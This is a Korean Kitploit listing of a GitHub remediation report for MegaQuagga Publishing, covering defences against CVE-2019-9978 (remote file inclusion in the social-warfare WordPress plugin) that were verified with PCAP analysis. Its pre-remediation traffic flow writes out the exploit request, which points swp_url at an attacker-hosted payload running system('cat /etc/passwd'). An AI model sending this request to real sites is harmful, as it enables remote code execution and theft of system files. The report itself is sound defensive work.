Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Vuln_Remediation_MegaQuagga — 점진적 방어 계층화를 통한 CVE-2019-9978 완화를 검증하는 MegaQuagga Publishing 시정 조치 보고서. 리버스 프록시 삽입, ModSecurity WAF 배포, Graylog SIEM 통합, 그리고 pfSense WAN 및 LAN 인터페이스 전반에 걸친 다단계 Wireshark PCAP 분석을 통한 SSL/TLS 적용을 문서화합니다. | Kitploit
도구/GitHubGitHub/b4ntgrim/vuln_remediation_megaquagga
Defensive ToolsVulnerability AnalysisWeb SecurityNetwork SecurityLearning & EducationIncident ResponseLog Analysis
GitHubb4ntgrim/vuln_remediation_megaquagga

Vuln_Remediation_MegaQuagga

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

점진적 방어 계층화를 통한 CVE-2019-9978 완화를 검증하는 MegaQuagga Publishing 시정 조치 보고서. 리버스 프록시 삽입, ModSecurity WAF 배포, Graylog SIEM 통합, 그리고 pfSense WAN 및 LAN 인터페이스 전반에 걸친 다단계 Wireshark PCAP 분석을 통한 SSL/TLS 적용을 문서화합니다.

저장소 보기
34개월 전아직 검토되지 않음

Vuln_Remediation_MegaQuagga

MegaQuagga Publishing의 취약점 완화 보고서: CVE-2019-9978 완화를 점진적 방어 계층을 통해 검증합니다. 리버스 프록시 삽입, ModSecurity WAF 배포, Graylog SIEM 통합, SSL/TLS 적용을 문서화하며, pfSense WAN 및 LAN 인터페이스에서 다단계 Wireshark PCAP 분석을 사용합니다.

취약점 수정 — MegaQuagga 수정 보고서

분석가: Samuel Weiss 조직: 0x2A Security 버전: 1.1 (2026년 4월 27일) 고객: MegaQuagga Publishing 분류: 기밀


개요

이 프로젝트는 MegaQuagga 침투 테스트에서 식별된 취약점의 적극적인 수정 과정을 문서화하며, 특히 CVE-2019-9978(social-warfare WordPress 플러그인의 원격 파일 포함)에 중점을 둡니다. 수정 조치는 pfSense WAN 및 LAN 인터페이스 모두에서 Wireshark를 사용한 다단계 패킷 캡처 분석을 통해 검증되었으며, 각 단계에서 점진적인 방어 제어가 적용되고 재테스트되었습니다.


파일

파일설명
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docx전체 수정 보고서: 경영진 요약, 수행된 조치, PCAP 기반 수정 증거, 향후 권장 사항 포함
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsxPCAP 분석 워크시트: 패킷 캡처 파일, 각 수정 단계별 트래픽 흐름, 출발지/목적지 IP, 포트, TCP 스트림 주석 문서화

범위

  • 대상 취약점: CVE-2019-9978 — social-warfare WordPress 플러그인의 원격 파일 포함(RFI)
  • 환경: pfSense 방화벽이 있는 MegaQuagga Publishing WordPress 서버
  • 접근 방식: 점진적 방어 계층화, 각 제어 적용 후 익스플로잇 재실행하여 효과 검증

수행된 수정 조치

1. 리버스 프록시 삽입

WordPress 웹 서버 앞에 리버스 프록시를 배포하여 네트워크 아키텍처를 변경, 외부 네트워크에서 백엔드 애플리케이션 서버로의 직접 트래픽을 차단했습니다. PCAP 증거를 통해 프록시 계층을 통한 트래픽 라우팅이 확인되었습니다.

2. 웹 애플리케이션 방화벽(WAF) — ModSecurity

ModSecurity를 리버스 프록시의 WAF 계층으로 활성화했습니다. RFI 익스플로잇 재실행 시, 악성 swp_url 페이로드가 차단되고 서버가 HTTP 403 Forbidden을 반환하여 WAF 규칙이 익스플로잇 시그니처에서 트리거되었음을 확인했습니다. Graylog SIEM에서 알림 활동이 확인되었습니다.

3. SIEM 통합 — Graylog

Graylog는 중앙 집중식 로그 집계 및 알림 모니터링을 제공하도록 구성되었습니다. ModSecurity 알림 규칙은 RFI 익스플로잇 시그니처를 탐지하도록 배포되어 공격 시도에 대한 실시간 가시성을 제공했습니다.

4. SSL/TLS 적용 및 방화벽 강화

  • 리버스 프록시에 유효한 SSL 인증서를 배포하고 SSL 오프로딩을 구성했습니다
  • pfSense WAN 방화벽 규칙을 포트 443의 HTTPS만 허용하도록 업데이트했습니다
  • 새로운 수신 정책을 반영하도록 NAT 규칙을 업데이트했습니다
  • 재테스트 시, RFI 페이로드가 차단되어 환경에 침투할 수 없었습니다

PCAP 캡처 로그


익스플로잇 트래픽 흐름 — 주요 패킷 분석

수정 전 (Red-Team-1 / pfSense-LAN-1)

root@kitploit:~
[공격자] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[공격자]:8000/payload.txt
[WordPress] → GET /payload.txt (공격자가 호스팅하는 PHP 페이로드 가져옴)
[공격자]  → 반환: <pre>system('cat /etc/passwd')</pre>
[WordPress] → 공격자에게 /etc/passwd 내용 반환 ✅ 익스플로잇 성공

WAF 적용 후 (pfSense-LAN-3)

root@kitploit:~
[공격자] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF]       → HTTP 403 Forbidden ✅ 익스플로잇 차단

SSL 적용 후 (pfSense-LAN-4)

root@kitploit:~
[공격자] → HTTPS만 허용; HTTP 포트 80은 pfSense WAN에서 차단
[pfSense]  → 익스플로잇 페이로드가 웹 서버에 도달할 수 없음 ✅ 익스플로잇 차단

향후 권장 사항

  1. 플러그인 패치 및 감사 유지 — social-warfare를 v3.5.3+로 업데이트; 비활성 플러그인을 제거하여 공격 표면 축소
  2. 방화벽 규칙 유지 — pfSense 규칙을 주기적으로 검토; 포트 80을 차단하거나 HTTPS로 리디렉션 유지
  3. SIEM 알림 지속 모니터링 — Graylog 알림 규칙을 정기적으로 검토 및 업데이트; 책임자를 지정하여 적시 대응 보장
  4. 정기적인 취약점 스캔 수행 — WordPress 서버 및 주변 인프라에 대해 정기 스캔 예약; 심각도 기반 일정에 따라 수정
  5. 최소 권한 원칙 적용 — 웹 서버 프로세스 및 WordPress 사용자 계정을 필요한 최소 권한으로 제한

GitHub 설명

MegaQuagga Publishing의 취약점 완화 보고서: CVE-2019-9978 완화를 점진적 방어 계층을 통해 검증합니다. 리버스 프록시 삽입, ModSecurity WAF 배포, Graylog SIEM 통합, SSL/TLS 적용을 문서화하며, pfSense WAN 및 LAN 인터페이스에서 다단계 Wireshark PCAP 분석을 사용합니다.

도구 다운로드
파일날짜인터페이스필터패킷 수단계
Red-Team-1.pcapng2025-01-03eth0 (Red-Team)없음4,013수정 전 기준
Red-Team-2.pcapng2026-04-22eth0 (Red-Team)없음26,841수정 전 (익스플로잇 확인)
pfSense-WAN-1.pcap2026-04-22em0 (WAN)192.168.100.x46WAN 측 익스플로잇 트래픽 캡처
pfSense-LAN-1.pcap2026-04-23em1 (LAN)192.168.100.x39LAN 측 익스플로잇 트래픽 (프록시 전)
pfSense-LAN-2.pcap2026-04-23em1 (LAN)포트 80/800045리버스 프록시 삽입 후
pfSense-LAN-3.pcap2026-04-24em1 (LAN)포트 80/8000/4431,000WAF 활성화 후 (403 Forbidden 확인)
pfSense-LAN-4.pcap2026-04-25em1 (LAN)포트 81/8000/443534SSL 오프로딩 후 (익스플로잇 차단)